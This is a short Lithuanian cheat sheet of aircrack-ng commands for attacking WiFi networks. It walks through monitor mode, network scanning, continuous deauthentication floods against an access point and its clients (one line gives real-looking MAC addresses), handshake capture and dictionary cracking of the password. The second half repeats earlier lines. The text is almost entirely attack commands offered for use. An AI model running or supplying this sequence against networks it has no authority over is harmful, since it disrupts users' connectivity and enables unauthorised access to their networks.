# airmon-ng && echo --- && iwconfig
Galima pasižiūrėti wifi interfeisą.
# iwconfig
Sukuriam stebėjimo režimą. "iwconfig" dabar rodys "mon0".
# airmon-ng start (wlan0)
Vienkartinis wifi skanavimas
# iwlist (wireless_interfeisas) scanning
Visų wifi tinklu stebėjimas.
# airodump-ng mon0
Deautentifikavimas:
Nesibaigiantis deauth siuntimas:
# aireplay-ng --deauth 0 -a (BSSID) --ignore-negative-one mon0
# aireplay-ng -0 0 -a (BSSID) --ignore-negative-one mon0 #arba
Deauth 5 paketų siuntimas:#sudo aireplay-ng -0 5 -a DC:FB:02:F1:2B:61 -c 7c:dd:90:50:65:3a --ignore-negative-one mon0
Efektivesnis deauth nurodant kliento mac:# aireplay-ng --deauth 0 -a (BSSID) -c (kliento_mac) --ignore-negative-one mon0
Handshake gaudymas:
# airodump-ng mon0 -w (pavadinimas) -c 1
–showack rodo išsamia informaciją apie ACK
Ieškom slaptažodžio žodynų sąraše.
# aircrack-ng Pavadinimas-01.cap -w (Žodyno_sąrašas)
logų stebėjimas
# tail -f -n 0 /var/log/syslog
Susiję: Žodžių sąrašai
Nuorodos:
Nuoroda - Įvairūs wireless hackinimo įrankiai.
Tut
Deauth 5 paketų siuntimas:#sudo aireplay-ng -0 5 -a DC:FB:02:F1:2B:61 -c 7c:dd:90:50:65:3a --ignore-negative-one mon0
Efektivesnis deauth nurodant kliento mac:# aireplay-ng --deauth 0 -a (BSSID) -c (kliento_mac) --ignore-negative-one mon0
# airodump-ng mon0 -w (pavadinimas) -c 1
–showack rodo išsamia informaciją apie ACK
# airodump-ng -w (pavadinimas) --bssid (BSID arba routerio MAC) -c 1 --showack mon0
Ieškom slaptažodžio žodynų sąraše.
# aircrack-ng Pavadinimas-01.cap -w (Žodyno_sąrašas)
logų stebėjimas
# tail -f -n 0 /var/log/syslog
Susiję: Žodžių sąrašai
Nuorodos:
Nuoroda - Įvairūs wireless hackinimo įrankiai.
Tut